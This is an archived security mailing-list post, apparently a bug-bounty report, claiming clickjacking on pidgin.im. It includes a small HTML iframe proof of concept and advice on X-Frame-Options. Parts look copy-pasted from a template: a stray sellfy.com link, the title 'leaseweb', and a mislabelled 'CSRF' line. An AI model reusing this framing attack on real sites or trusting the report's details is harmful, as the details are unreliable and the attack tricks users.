Clickjacking in the main domain
Cyber bounty
cyberlord0x1 at gmail.com
Sun Jan 20 17:02:37 EST 2019
Hello Security Team
Description:
Domain: https://pidgin.im <https://sellfy.com>
Vulnerability: Clickjacking
Clickjacking (User Interface redress attack, UI redress attack, UI
redressing) is a malicious technique of tricking a Web user into clicking
on something different from what the user perceives they are clicking on,
thus potentially revealing confidential information or taking control of
their computer while clicking on seemingly innocuous web pages.
The server didn't return an X-Frame-Options header which means that this
website could be at risk of a clickjacking attack. The X-Frame-Options HTTP
response header can be used to indicate whether or not a browser should be
allowed to render a page in a <frame> or <iframe>. Sites can use this to
avoid clickjacking attacks, by ensuring that their content is not embedded
into other sites.
This vulnerability affects Web Server.
POC:
1.open notepad and paste the folloing code
<html><head>
<title>leaseweb</title>
<style>
frame {
opacity: 0.5;
border: none;
position: absolute;
top: 0px;
left: 0px;
z-index: 1000;
}
</style>
</head>
<body>
<script>
window.onbeforeunload = function()
{
return " Do you want to leave ?";
}
</script>
<p> site is vulnerable for CSRF!</p>
<iframe id="frame" width="100%" height="100%" src="
https://pidgin.im"></iframe>
</body>
</html>
2.save it as <anyname>.html eg s.html
3.and just simply open that..
reference :
https://www.owasp.org/index.php/Testing_for_Clickjacking_(OWASP-CS-004)
https://www.pentestpartners.com/security-blog/clickjacking-explained-in-detail/
Impact:
By using Clickjacking technique, an attacker hijack's click's
meant for one page and route them to another page, most likely
for another application, domain, or both.
Remediation:
Frame busting technique is the better framing protection
technique.
Sending the proper X-Frame-Options HTTP response headers
that instruct the browser to not allow framing from other
domains
Thanks !
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://pidgin.im/cgi-bin/mailman/private/security/attachments/20190121/b134e03a/attachment.html>
More information about the security
mailing list